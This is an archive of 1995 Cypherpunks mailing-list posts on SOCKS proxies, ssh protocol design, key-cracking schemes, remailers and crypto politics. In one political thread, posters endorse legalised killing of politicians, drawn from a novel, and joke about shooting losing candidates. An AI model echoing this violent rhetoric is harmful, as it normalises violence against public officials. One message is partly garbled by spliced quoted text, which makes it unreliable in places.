DF96 Thank you for question, exit left to Funway. From enzo at ima.net Sat Jul 22 04:47:59 1995 From: enzo at ima.net (Enzo Michelangeli) Date: Sat, 22 Jul 95 04:47:59 PDT Subject: Netscape the Big Win In-Reply-To: <199507211727.KAA06527@jobe.shell.portal.com> Message-ID: On Fri, 21 Jul 1995, Hal wrote: > This sounds very good if it already is almost working. The TCP > connection which is opened would have to be to a server on the local > machine, so it would be important that the software support that. Also, > the local SOCKS relay would of course not want its winsock calls to be > intercepted and translated in this way, so there would need to be some > alternative way to access "vanilla" winsock. Can you give any > more information on the NEC work? I can only quote the original posting to the SOCKS mailing list - I answered their call for beta-testers, but I haven't heard back from them, yet: -------------------------------- 8< --------------------------------------- >From cornell at syl.dl.nec.comSat Jul 22 18:50:10 1995 Date: Thu, 20 Jul 1995 10:05:47 -0500 (CDT) From: Cornell Kinderknecht To: socks at syl.dl.nec.com Cc: Cornell Kinderknecht Subject: Good news for Windows/Winsock users New SOCKS application for PC/Windows/Winsock. Looking for beta volunteers... We've developed an MSWindows .DLL (Windows version 3.1) that allows unmodified TCP-based Winsock applications and TCP/IP stacks to communicate through a SOCKS4.2 server. This will hopefully be available for general release sometime soon. Currently, I'm looking for volunteers to do some beta testing. If interested, willing to provide feedback, and don't mind rebooting your PC when when it locks up :-), email the following information about your environment to scbeta-apply at syl.dl.nec.com: 1. Winsock stack type and version (Trumpet, NetManage, etc.). 2. Other network OS/drivers (Netware, IPX, packet drivers, SLIP, etc.). 3. Winsock applications (trumptel, wsftp, netscape, etc.). 4. Your email address. 5. Anything else relevant... I'll keep the number of beta testers limited and so unfortunately I might not be able to include everyone who requests. Oh, BTW, here are some requirements: 1. MS Windows3.1. 2. Installed and operating Winsock TCP/IP stack. 3. Installed and operating SOCKS server (v.4.2). 4. PC running Winsock stack must be able to use DNS to resolve names and IP addresses (including its own). --- Cornell | Cornell Kinderknecht Email: cornell at syl.dl.nec.com | | CSTC | | NEC Systems Lab. Phone: 214-518-3509 | | Irving, TX (Dallas) | -------------------------------- 8< --------------------------------------- [...] > non-blocking connect as there is in Windows. Maybe Windows 95 will allow > a more Unix-style communication model, though. Should the proxy require > Windows 95, or will Windows 3 still be in widespread use for another > year or two? I'm afraid we'll have to live with async socket calls for a while... > > Also IMO the requirements for the Internet relay are pretty different > than for the Windows relay. The Internet relay needs only to be able to > decrypt/encrypt on the port where the request comes from while sending > plain data the other way. It needs a config file so the owner can > control what kinds of outgoing TCP connections can be done. The Windows > one needs to be able to do nested encryption (if chains will be allowed > eventually), to set up chains, etc. So for these reasons I am inclined > to think that the two relays would be separate programs. Well, a config file would be necessary for the windows one too. For example, we could want to socksify only connections to some sites/ports, socksify+encrypt some others, and open direct TCP connections to others yet, such as servers on the same net (I presume that NEC's DLL will attempt to socksify all the connections, so we should de-sockisfy some of them intoducing sockd functionality. > The Windows version would need to decrypt incoming data; you don't want > that coming in the clear. Oh yes, I actually meant that it should only be able to issue, and not also accept, "client hello" requests (as per SSL model). > > I am a little unclear on the certificate situation. As we saw with the > PGP key servers before RSAREF PGP existed, RSA put pressure on these > public sites which they saw as contributing to the use of infringing > software. Similarly having a certificate created by infringing software > might be seen as illegal, even if RSAREF was actually used for the > handshaking in the protocol. Server operators are quite vulnerable to > threatening letters from RSA. RSA patents (I mean RSA, not RSADSI's) are only valid in USA. If I set up a certifying authority, say, here in Hong Kong, using EAY's code written in Australia, how could RSADSI complain? Server operators would import data created under perfectly legal conditions. > Another problem with RSAREF is that it does not allow you to exchange a > session key using RSA encryption in a straightforward manner. The entry > points you have legal access to choose a random session key, PK encrypt > it, send it, and then encrypt the message using that session key with DES > or 3DES. However I notice that SSLREF calls undocumented entry points > like RSAPrivateDecrypt and RSAPublicEncrypt. I am not sure how they are > able to do this. Maybe they got special permission from RSA. I don't > know whether the SSLEAY library would be able to do this without such > special arrangements. That should be investigated. Is RSAREF's licence only valid for some entry points? In any case, I suppose that SSLREF may be used with any certificate, unlike Netscape (am I wrong?). > One other problem is the risk taken by people running the relay servers > on the net. These could be used to launder connections by hacker / > cracker types. So probably only a limited set of outgoing ports would be > permitted, say, 80 and 1080 which are the most common http ports. This > would restrict the utility of the SOCKS approach for other uses like > secure telnet, unfortunately. Well, the same problem exists for illegal uses of the present remailers, but hasn't stopped their operators. Enzo From pgf at tyrell.net Sat Jul 22 06:05:52 1995 From: pgf at tyrell.net (Phil Fraering) Date: Sat, 22 Jul 95 06:05:52 PDT Subject: An idea about Java and remailer clients and servers... Message-ID: <199507221301.AA27475@tyrell.net> I think someone mentioned the possibility of running a Mixmaster client in Java. I was under the impression that there was a lot of common code between the Mixmaster client and server versions, at least in the current version. Does it have to be the case, then, that we even have separate client and server versions? If a new program is going to be written in Java, can't it have the functionality of both client and server? Why not "charge" for the ability to send an anonymous message with the duty to have for a short time (maybe an hour or two) running on your machine a node in a remailer network? Phil From dan at milliways.org Sat Jul 22 07:41:30 1995 From: dan at milliways.org (Dan Bailey) Date: Sat, 22 Jul 95 07:41:30 PDT Subject: Government Mandated Keys Message-ID: <199507221441.AA32224@ibm.net> On Wed, 19 Jul 1995 11:39:07 -0700 you wrote: >At 11:02 AM 7/19/95 PDT, rick hoselton wrote: >>I want to register the 1-bit key of "1". I expect to >>send about half my message bits encrypted, the rest will be clear-text. > >Oh, go ahead, register 0 also. You'll probably want to switch keys >occasionally during sessions. Actually, why don't we just register our favorite geometric constant, pi? Assuming it's non-repeating, and non-terminating, you're guaranteed that whatever key you end up using will be somewhere in pi. Dan ****************************************************************************** Vote Speaker Newt Gingrich for President!! Dan Bailey Worcester Polytechnic Institute, class of 1997. dan at milliways.org ****************************************************************************** From bigdaddy at ccnet.com Sat Jul 22 09:54:08 1995 From: bigdaddy at ccnet.com (bigdaddy at ccnet.com) Date: Sat, 22 Jul 95 09:54:08 PDT Subject: Netscape the Big Win(dows) In-Reply-To: Message-ID: On Fri, 21 Jul 1995, Lucky Green wrote: > At 19:15 7/21/95, bigdaddy at ccnet.com wrote: > Depends on the load on the host, the speed of your link, the speed of your > Mac, and if you want to trade features for speed at that given moment. It's more from the graphical interface than anything else, or has been. My Mac is a 25 MHz 040...not that fast these days, but pretty good. I simply miss being able to tab through my news. > The human interface is the whole point behind Newswatcher and Nuntius. As > for Mac users that prefer tin, they already have an implementation > available. It is called telnet. Unfortunately, with telnet(and yes, I do use this extensively), one is hobbled by the fact that the tin program resides on the other side of the link. In most cases, the link itself, and the machine it connects to, are insecure. This means that one cannot easily use PGP to auto-sign messages without keeping the key and a copy of PGP on the remote server. One can, of course, pre-compose the message, sign/encrypt it, and then upload it, but that is a great deal of work compared to simply using TinSign. It also works against the spontaneous nature of news(for me, at least). When was the last time you went to a newsgroup knowing everything you would say in advance? > I have been thinking about writing AppleScripts that link Newswatcher with > PGP. Unfortunately, there is another project that has precedence. Still, as > with most great utility software not yet available, you can always try to > write it yourself. I'm in the sixth week of my first programming class...as if that means anything. :-) I see your point, 'cypherpunks write code' and all. Simply wishing that I could run tin (relatively) securely on my Mac w/out needing to install FreeBSD or Linux(which I want to do, anyway). David Molnar From jburrell at crl.com Sat Jul 22 10:28:13 1995 From: jburrell at crl.com (Jason Burrell) Date: Sat, 22 Jul 95 10:28:13 PDT Subject: Something occured to me Message-ID: <199507221725.NAA18382@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > > On Fri, 21 Jul 1995, Robert A. Hayden wrote: > > > Whent he republicans took over the congress, they instidtued that > > Contract on America. One of the first laws that was passed (by both > > parties, I might add) was a law that made lawmakers abide by the same > > laws that "normal" people abide by. > > If you believe that... > > Well, it is true, under certain limited circumstances, but it doesn't > make them criminally liable for writing bad laws, nor can it. The pity, of course, is that we can't get Exon for passing around a book that he said contained child pornography, since he's immune while he's on the Senate floor. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMBE0fyoZzwIn1bdtAQGWwAF/b66+ddWoQ+k7lqOvRu5/2uZgCop5X+d4 ipMc98PXCucBiM5QHP5l6sIopZUVcr5H =grqV -----END PGP SIGNATURE----- From Andrew.Spring at ping.be Sat Jul 22 11:51:27 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sat, 22 Jul 95 11:51:27 PDT Subject: big word listing Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Post Office Protocol 3 (POP3) has an optional command called >APOP which sends a string of the form "". >The POP3 client calculates the MD5 digest of > > password > >and sends it to the server as "APOP username 58349485whatever89583449". > >I like it. > Of course, this requires the user password to be stored unencrypted on the server; which you may not want to do. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBEbT44k1+54BopBAQEvaAP/btvc6mK8aFL5ONL70aQRhJIY/Zu+6HnU WSDiVNLTtbEiMA+4W7hOD3RQORl42r/Lqdyevq+VmG1LAikCETDgS77jiGq11Kt+ q1HVGQEkiPexd8asJw66hjYLo+vWylu2U39e7YWc01ccr2Hr+zZR+/MHVPQsMq5y LXTiercKsow= =gdHC -----END PGP SIGNATURE----- -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From ericande at linknet.kitsap.lib.wa.us Sat Jul 22 12:22:24 1995 From: ericande at linknet.kitsap.lib.wa.us (Eric Anderson) Date: Sat, 22 Jul 95 12:22:24 PDT Subject: write some code Message-ID: Sorry to revive such an old and tired thread, however I found the idea quite inspiring and went out and bought a C programming primer that comes W/ a complete tutorial and Borland's turbo C++ Lite compiler. You people have had a *VERY* profound impact on me and that is what set me on this course. I have just written my first program; the mandatory "Hello world" bit. Can someone point me in the direction of a mailing list about C programming? I have been reading the various comp. newsgroups, but I want to join a list on the subj. and make some more friends. Thanks, Eric From rsalz at osf.org Sat Jul 22 13:53:13 1995 From: rsalz at osf.org (Rich Salz) Date: Sat, 22 Jul 95 13:53:13 PDT Subject: Three strikes you're out! for politicians... yeah we wish! Message-ID: <9507222052.AA28172@sulphur.osf.org> Better yet do it the way Comedy Central wanted to: Three strikes your out and term limits. You can run for re-election but if you lose you get shot. From samman at CS.YALE.EDU Sat Jul 22 14:01:02 1995 From: samman at CS.YALE.EDU (Rev. Ben) Date: Sat, 22 Jul 95 14:01:02 PDT Subject: Under Siege II Message-ID: Saw Under Siege II last nite--fairly bad movie--wouldn't recommend it, but there was some cpunks/crypto relevance. * Mentioned the No Such Agency's SIGINT capabilities via COMMSAT * Mentioned encryption several times: + WRT to cell phones + WRT to Newton and encryping files + WRT to codes--used a CD-ROM to store a keyspace and encrypt and compare Encryption is going mainstream folks. Ben. From sandfort at crl.com Sat Jul 22 14:28:31 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 22 Jul 95 14:28:31 PDT Subject: CALLER ID AVOIDANCE Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, While reading the July issue of Soldier of Fortune, I ran across an ad for yet another telephone anonymity service. It reads: CALL 1-900-CUT TRAX Secure your most sensitive calls from all forms of caller I.D. and return-call technologies? Now make calls from your own telephone safely and anonymously. No need to find a public phone to be discreet. Trackers never see your number...only ours! And their number will not appear on your phone bill. Call any number in the continental US... Just $3.95 a minute for safe secure conversations! Call 1-900-CUT-TRAX (1-900-288-8729) Beacon Telesystems 914-423-3329 Not necessarily as secure as they would have you believe, but it does demonstrate there is a market for anonymity, I guess. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jamesd at echeque.com Sat Jul 22 15:11:03 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 22 Jul 95 15:11:03 PDT Subject: Netscape the Big Win Message-ID: <199507222210.PAA25441@blob.best.net> At 05:12 PM 7/20/95 -0400, Patrick J. LoPresti wrote: > When it becomes feasible to do what you are asking for Netscape, I am > sure that someone will do it. At the moment, it is largely out of our > hands, since the Netscape interface is totally controlled by Netscape > Communications... Netscape for windows, and I presume for Windows NT, supports DDE and OLE --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From rfreeman at netaxs.com Sat Jul 22 15:54:31 1995 From: rfreeman at netaxs.com (Richard Freeman) Date: Sat, 22 Jul 95 15:54:31 PDT Subject: The OS wars and DOOM... Message-ID: <199507222254.SAA26768@access.netaxs.com> >Given that games usually program close to the hardware, and are >therefore the _most_ difficult things to port from one environment >to another, it really makes one wonder why Excel isn't out for >(for example) Linux or BSD today. > I can think of one good reason for starters: Microsoft makes Excel. Microsoft makes Windoze. Windoze runs on IBM's and Linux runs X-Windows on IBM's. Microsoft doesn't make Linux which already has a tremendous advantage in cost and capability. Now how many people would pay to upgrade to Windoze 95 if there were a true multitasking OS which was free and more efficient and capable of operating on more limited systems and with as strong a software base? If I could get Microsoft Office for Linux, I would have switched myself. Unfortuantely, I don't have the disk space for both DOS and Linux, and I need the commercial grade word-processors, etc... There isn't all that much that needs to be added to an OS like Linux to make it easy for the general public (perhaps a set of default settings that don't require much fiddling by a unix wizard). Finally, once Microsoft promotes a unix-based OS by making software for it, people will start realizing how much free stuff there already is for unix, and they will stop buying all those nifty utility packages that they buy for DOS/Windoze. And lastly, heaven forbid, people will have access to a windowed OS with command line capability! Now we couldn't have that now, could we? :) ----------------------------------------------------------------- Richard T. Freeman - finger for pgp key 3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman From tj at compassnet.com Sat Jul 22 16:23:42 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Sat, 22 Jul 95 16:23:42 PDT Subject: Doling out keyspace (was Re: There is no True Key) Message-ID: > > - Each helper requests N bits of keyspace. > > - That chunk is doled out "randomly" by the server. >Is there any reason why the server should have to dole out the in the >first place? If a reasonable seed is available, there's no reason each >helper couldn't just generate a random starting key on its own (with a >uniform distribution). The owner of the key being cracked jumps in and "randomly" selects the part of the keyspace containing the key, then reports back in the negative. This defense of the key is reduced if the server doles out pieces of the keyspace randomly, selected only for size, and further reduced if the same space is given out multiple times to different requestors. Bolivar From sandfort at crl.com Sat Jul 22 17:06:44 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 22 Jul 95 17:06:44 PDT Subject: HOUDINI ON CRYPTO Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, I ran across an old book I bought when I was an adolescent. Like most boys (I don't know about girls) I went through a phase when I was interested in magic. The name of the book was "Houdini on Magic." In it, there is a section about Houdini's fascination with cryptography. He talks about relatively primative substitution ciphers and the like. One example, though, I thought might be of interest to Cypherpunks. He said the following inscription was written over the Decalogue in a country church. Apparently, no one was able to read it for over 200 years. Can you?: PRSRVYPRFCTMNVRKPTHSPRCPTSTN S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From mazieres at pa.dec.com Sat Jul 22 17:30:45 1995 From: mazieres at pa.dec.com (David Mazieres) Date: Sat, 22 Jul 95 17:30:45 PDT Subject: Ssh "security hole": proposed fix Message-ID: <9507230027.AA10524@venus.pa.dec.com> Well, a while ago I suggested the following as simplified (and therefore easier to find bugs in) ssh protocol: > PREAMBLE: > > (1) A -> B: A > (2) B -> A: Cb, PKsb, PKb > (3) A -> B: {Kab}_PKsb, {A, B, Cb}_Kab > (4) B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab > > SSH_AUTH_RHOSTS: > > (5) A -> B: 0 > > SSH_AUTH_RHOSTS_RSA: > SSH_AUTH_RSA: > > (5) A -> B: {{A, B, Cb, Kab}_SKa, PKa}_Kab > > SSH_AUTH_PASSWORD: > > (5) A -> B: {Ka}_Kab I was assuming that you would basically have to tolerate man-in-the-middle style attacks if A did not know PKb before the exchange. However, I have since realized that it is easy to have one's public key in an NFS mounted home directory when talking to a host one has never talked to before. Thus, B can know PKa even if A does not know PKb. This is enough to prevent man in the middle attacks if we modify the protocol slightly: PREAMBLE: (1) A -> B: A (2) B -> A: Cb, PKsb, PKb (3) A -> B: {Kab}_PKsb, {A, B, Cb}_Kab (4) B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab SSH_AUTH_RHOSTS: SSH_AUTH_PASSWORD: (5) A -> B: 0 SSH_AUTH_RHOSTS_RSA: SSH_AUTH_RSA: (5) A -> B: {{A, B, Cb, Kab, PKsb}_SKa, PKa}_Kab ^^^^ IF AUTHENTICATION NOT SUFFICIENT: (6) B -> A: {"Passwd:"}_Kab (7) A -> B: {Ka}_Kab ; Ka is A's password David From C.CREUTZIG at BIONIC.zerberus.de Sat Jul 22 17:38:21 1995 From: C.CREUTZIG at BIONIC.zerberus.de (Christopher Creutzig) Date: Sat, 22 Jul 95 17:38:21 PDT Subject: Non-US mixmaster sites In-Reply-To: <4VHP8c1w165w@vox.xs4all.nl> Message-ID: Ad> remailer at replay.com Ad> remailer at flame.alias.net Ad> remailer at utopia.hacktic.nl mixmaster at bi-node.zerberus.de is up and running. --- Christopher Creutzig | c.creutzig at bionic.zerberus.de PGP-verschl�sselte Nachrichten bevorzugt -- benutzt Briefumschl�ge! From bluebird at alpha.c2.org Sat Jul 22 17:44:00 1995 From: bluebird at alpha.c2.org (bluebird at alpha.c2.org) Date: Sat, 22 Jul 95 17:44:00 PDT Subject: Mixmaster for DOS Yet? Message-ID: <199507230016.RAA03110@infinity.c2.org> [Please reply via netmail or Cc: - I have only periodic access to list.] Is the Mixmaster user software for DOS platforms completed yet? Thanks for any help. From alan.pugh at internetmci.com Sat Jul 22 19:45:35 1995 From: alan.pugh at internetmci.com (Alan Pugh) Date: Sat, 22 Jul 95 19:45:35 PDT Subject: Java (was Netscape: the big win) Message-ID: <01HT6RA4SJ3A938ROQ@MAILSRV1.PCY.MCI.NET> -----BEGIN PGP SIGNED MESSAGE----- > There are many crypto-anarchy applications as well: > Key cracking. If you can write a key-cracker and keyspace fetcher in > Java, then people can join key cracking efforts as easily looking up > an URL. It may not be nearly as efficient as the highly optimized C > versions used in the current RC4-40 efforts, but there's going to be > millions of potential workers this way. If you were charging money > to break keys (or you were looking for keys that are very valuable > to you), you could set up the worker client to accept e-cash for in > return for searching keyspace "Click here to earn money while you > aren't using your machine..." Ensuring that workers are actually > searching the keyspace and other implementation details is left as an > exercise for the reader. > > e-instrument or information exchanges, with Java interfaces for bidding, > buying, selling, etc... i think i prefer the idea mentioned previously on the list where it works pretty much like a lottery. you could operate it in one of two ways. if the encrypted data was particularly valuable to its owner and was willing to put up a reward for the key, there would be an incentive for people to spend idle time running through keyspace. if it was structured as a reward, no money need be paid until the key is found. it could also be set up more like a traditional lottery where you 'buy' x amont of keyspace and if you hit it, all e-cash collected would go to you. there would be many problems with running this. nothing could keep someone from just running keys on their own in the hope of hitting it, then buy the keyspace that contains it if he got a hit. if the keyspace were allocated sequentially, and the person looking for the key only paid to the person who initially 'purchased' the keyspace, the person who got it could advertise for the person who got the space, although this would be problematic. if someone really wanted to do this, it would be _much_ easier to just run the operation similar to what was performed here in cypherpunks recently with the person who first reports the hit getting a reward of some amount, less a modest amount for the person/group coordinating the effort. amp <0003701548 at mcimail.com> Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D July 22, 1995 14:35 if someone wants a key and is willing to pay someone DataHavens, which would probably require complex (internally) software to use. I'm sure the online casino people are salivating over the prospects too... Basically any fancy crypto application that requires a custom client to operate... Since its platform independent, efforts will be put to better use as well. andrew -----BEGIN PGP SIGNATURE----- Version: 2.61 iQEVAwUBMBEazygP1O9KJoPBAQGHFwgAiO2ha7BFw04Fu3RNuk9FLFaZNrUYrFjR 5VBNkWeE3JOol7xSfrd7V8IzE2UyrVEwa4eyx5jHrPVQYxC9UTHzUW5nG3/vMefD gtCsQQcz5hL3Qbv6Cn2dqkTkWGbL7y/MxmblBm0u8vdX6/LPjAVTfucNrN9KxDY/ NXDM3tr9FclAWch6VKiXvjMeoognXNtpFfI76ReZzimJ4Yyoy9naGQ8BLdPiU1Xb mZIuFnVQWJe56YlBBgXo1aLsAcg48oWYCSMQXPRiQ/Bd6kL/Q6KHv34IbV8WVYib 9XjJd84JU+he5LDOIn9SO7gLXkRuBiiRsOalX89jjwAvFZwQuLMpGQ== =rqot -----END PGP SIGNATURE----- ********************************************* * / Only God can see the whole * * O[%\%\%{<>===========================- * * \ Mandlebrot Set at Once! * * amp * * <0003701548 at mcimail.com> * * * ********************************************* Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D From shamrock at netcom.com Sat Jul 22 19:57:00 1995 From: shamrock at netcom.com (Lucky Green) Date: Sat, 22 Jul 95 19:57:00 PDT Subject: Something occured to me Message-ID: <199507230254.WAA21641@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199507221725.NAA18382 at bb.hks.net>, jburrell at crl.com ("Jason Burrell") wrote: >The pity, of course, is that we can't get Exon for passing around a book >that he said contained child pornography, since he's immune while he's on >the Senate floor. Wouln't the book become part of the Congressional Record? I'd love to know what Exon considers child pornography. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMBG51CoZzwIn1bdtAQHXmwF/b07myILkBJ6NugS+rSx6+R2hfuDb4j37 AlVZmKLkB1j5cgAkfeyAByLalIv7lDAL =GoSe -----END PGP SIGNATURE----- From blancw at accessone.com Sat Jul 22 20:30:10 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Sat, 22 Jul 95 20:30:10 PDT Subject: HOUDINI ON CRYPTO Message-ID: <9507230331.AA27567@accessone.com> From: Sandy Sandfort . . . there is a section about Houdini's fascination with cryptography. He talks about relatively primative substitution ciphers and the like. One example, though, I thought might be of interest to Cypherpunks. He said the following inscription was written over the Decalogue in a country church. Apparently, no one was able to read it for over 200 years. Can you?: PRSRVYPRFCTMNVRKPTHSPRCPTSTN .................................... It looks to be something like this to me: PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN .. Blanc From hal9001 at panix.com Sat Jul 22 20:31:13 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sat, 22 Jul 95 20:31:13 PDT Subject: Three strikes you're out! for politicians... yeah we wish! Message-ID: At 04:00 7/22/95, Craig Hubley wrote: >> >> About two weeks ago, there was some talk in here with regards to holding >> DC lawmakers crominally liable for passign bad laws. This was followed >> up with postins pointing out that you can't do that. > >Here's something you *can* do: > >"Three strikes you're out" for politicians. > >Any time the Supreme Court strikes down a law, any politician who has been >found to have voted in favor of three such laws is immediately stripped of >all offices and rendered ineligible to run for public office ever again, >at any level. (The same might apply to those found to have lied to a court > >A politician who would trade citizen rights for political gain must be denied >the benefits of such a tradeoff. This might prevent the rise of demagogues. >Term limits, etc., would of course help as well. It would also give those >politicians who vote for 'motherhood' issues like 'protecting kids from the >perverts on the Internet' a good reason to think twice about the real issue. >If they REALLY believe they are protecting someone, they will still vote in >favor. If they are going with the flow to avoid criticism, they'll lose in >the end. > >My reasoning is that any politician whose laws are consistently struck down >should be deemed to lack a fundamental understanding of the rights of the >citizens of his/her country or jurisdiction. They are thus a poor guardian >of those rights. > >You heard it here first. > >Craig Hubley I'd love to see the system described in H. Beam Piper's "A Planet for Texans" implemented. Under that system, all Politicians are BY LAW representing the interests of ALL their constituents. Any constituent who feels that he/she is not being adequately represented (or feels that his/her views/interests are being misrepresented) is by law granted total access to the Politician and may register this disapproval of the Politician's Performance in any way up to and including killing the Politician. If the Politician (or his/her survivors/friends ) feel that the constituent used excessive force (such as using a car bomb or a long distance weapon like a rifle as opposed to using a personal weapon such as a hand gun at close range) or force out-of-proportion to the action being protested, they can bring charges in the "Court of Political Justice". In such a trial it is the job of the prosecution (ie: The Politician or Representatives) to prove that the constituent did, in fact, overstep the accepted rules for registering disapproval. From erc at khijol.intele.net Sat Jul 22 20:45:59 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Sat, 22 Jul 95 20:45:59 PDT Subject: Three strikes you're out! for politicians... yeah we wish! In-Reply-To: Message-ID: On Sat, 22 Jul 1995, Robert A. Rosenberg wrote: > At 04:00 7/22/95, Craig Hubley wrote: > >> > >> About two weeks ago, there was some talk in here with regards to holding > >> DC lawmakers crominally liable for passign bad laws. This was followed > >> up with postins pointing out that you can't do that. > > > >Here's something you *can* do: > > > >"Three strikes you're out" for politicians. > > > >Any time the Supreme Court strikes down a law, any politician who has been > >found to have voted in favor of three such laws is immediately stripped of > >all offices and rendered ineligible to run for public office ever again, > >at any level. (The same might apply to those found to have lied to a court > > > >A politician who would trade citizen rights for political gain must be denied > >the benefits of such a tradeoff. This might prevent the rise of demagogues. > >Term limits, etc., would of course help as well. It would also give those > >politicians who vote for 'motherhood' issues like 'protecting kids from the > >perverts on the Internet' a good reason to think twice about the real issue. > >If they REALLY believe they are protecting someone, they will still vote in > >favor. If they are going with the flow to avoid criticism, they'll lose in > >the end. > > > >My reasoning is that any politician whose laws are consistently struck down > >should be deemed to lack a fundamental understanding of the rights of the > >citizens of his/her country or jurisdiction. They are thus a poor guardian > >of those rights. > > > >You heard it here first. > > > >Craig Hubley > > > I'd love to see the system described in H. Beam Piper's "A Planet for > Texans" implemented. Under that system, all Politicians are BY LAW > representing the interests of ALL their constituents. Any constituent who > feels that he/she is not being adequately represented (or feels that > his/her views/interests are being misrepresented) is by law granted total > access to the Politician and may register this disapproval of the > Politician's Performance in any way up to and including killing the > Politician. If the Politician (or his/her survivors/friends ) feel that > the constituent used excessive force (such as using a car bomb or a long > distance weapon like a rifle as opposed to using a personal weapon such as > a hand gun at close range) or force out-of-proportion to the action being > protested, they can bring charges in the "Court of Political Justice". In > such a trial it is the job of the prosecution (ie: The Politician or > Representatives) to prove that the constituent did, in fact, overstep the > accepted rules for registering disapproval. Reminds me of the old Heinlein advice about supplying forceful punctuation after the word "but" in: "Of course, it's none of my business, but...". RAH advises against using excessive force - cutting the offender's throat is only a momentary pleasure and is bound to get you talked about ;) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From sandfort at crl.com Sat Jul 22 21:14:11 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 22 Jul 95 21:14:11 PDT Subject: HOUDINI ON CRYPTO In-Reply-To: <9507230331.AA27567@accessone.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Blanc wrote: >> PRSRVYPRFCTMNVRKPTHSPRCPTSTN > .................................... > > It looks to be something like this to me: > > PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN Close, very close. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From carolab at censored.org Sat Jul 22 21:50:05 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Sat, 22 Jul 95 21:50:05 PDT Subject: Something good for a laugh..... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I am in hell....... Still stuck without a good PPP connection. Been this way for over a week. I guess all my fans now have something good to giggle about. I'll be at it hard on Monday, and somehow this will get fixed. My IP address changed, and I think it's the problem. Love Always, Carol Anne -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBG7y4rpjEWs1wBlAQGUZQQArrRBlENKVnhvL23VPyH9TR3r3M+CytiU MoU4XwN18onfXzohJZmafcYJLBvb7aFPnPi8Kx/lHRO2Hx0cSlYIC1Hq3rACh1Tl ZsFtpiWwm3empZXQQL5jx3WOkX8VSKpjrlrUoR+jFYJ74AqapcXXJt90bYlP0jYF b5BRcZBVj4o= =kPNj -----END PGP SIGNATURE----- Member Internet Society - Certified BETSI Programmer - WWW Page Creation ------------------------------------------------------------------------- Carol Anne Braddock <--now running linux 1.0.9 for your pleasure carolann at censored.org __ __ ____ ___ ___ ____ carolab at primenet.com /__)/__) / / / / /_ /\ / /_ / carolb at spring.com / / \ / / / / /__ / \/ /___ / ------------------------------------------------------------------------- A great place to start My Cyber Doc... From skaplin at mirage.skypoint.com Sat Jul 22 21:54:07 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Sat, 22 Jul 95 21:54:07 PDT Subject: HOUDINI ON CRYPTO In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 22 Jul 1995, Sandy Sandfort wrote: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > Blanc wrote: > > >> 